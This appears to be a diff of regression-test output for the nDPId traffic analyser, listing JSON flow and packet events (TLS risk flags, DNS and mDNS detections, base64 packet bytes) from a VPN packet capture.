+01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01539{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABXLuMAAP8R6zkKAADjS0tLS\/3MADUAQ49kJ8YBAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="} 
-00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABT7b0AAP8RLGMKAADjS0tLS\/CtADUAP6A2wl8BAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwATABMAIxMAdpbi1hZGRyBGFycGEAAAwAAQ=="} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1569687260767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687260767,"pkt":"NDY7z3UoLH6BsEqhCABFAABXAABAADoRnx1LS0tLCgAA4wA1\/cwAQw7hJ8aBgwABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260767,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260767,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1569687260772,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569687260772,"pkt":"NDY7z3UoLH6BsEqhCABFAABTAABAADoRnyFLS0tLCgAA4wA18K0APx+zwl+BgwABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwATABMAIxMAdpbi1hZGRyBGFycGEAAAwAAQ=="} 
-00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1569687261034,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1569687261034,"pkt":"LH6BsEqhNDY7z3UoCABFAABPSYUAAP8R0J8KAADjS0tLS9+tADUAOxFSxpgBAAABAAAAAAAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAAQAB"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1569687261035,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1569687261035,"pkt":"LH6BsEqhNDY7z3UoCABFAABPv9YAAP8RWk4KAADjS0tLS86PADUAO9rj8yQBAAABAAAAAAAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAHAAB"} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1569687261050,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1569687261050,"pkt":"NDY7z3UoLH6BsEqhCABFAACgAABAADoRntRLS0tLCgAA4wA1360AjBq8xpiBgwABAAAAAQAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAAQABwCMABgABAAACzwBFBm5zLTYzMglhd3NkbnMtMTUDbmV0ABFhd3NkbnMtaG9zdG1hc3RlcgZhbWF6b27AKgAAAAEAABwgAAADhAASdQAAAVGA"} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687261050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687261050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1569687261054,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1569687261054,"pkt":"NDY7z3UoLH6BsEqhCABFAACgAABAADoRntRLS0tLCgAA4wA1zo8AjF9N8ySBgwABAAAAAQAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAHAABwCMABgABAAADVABFBm5zLTYzMglhd3NkbnMtMTUDbmV0ABFhd3NkbnMtaG9zdG1hc3RlcgZhbWF6b27AKgAAAAEAABwgAAADhAASdQAAAVGA"} 
-00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687261054,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00692{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":208,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246981,"flow_last_seen":1569687261317,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687261317,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 
-00703{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246982,"flow_last_seen":1569687261318,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687261318,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687261054,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00692{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":208,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246981,"flow_last_seen":1569687261317,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687261317,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00703{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246982,"flow_last_seen":1569687261318,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687261318,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1569687261485,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1569687261485,"pkt":"LH6BsEqhNDY7z3UoCABFAABPCDAAAP8REfUKAADjS0tLS+dWADUAO8LFIuMBAAABAAAAAAAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAAQAB"} 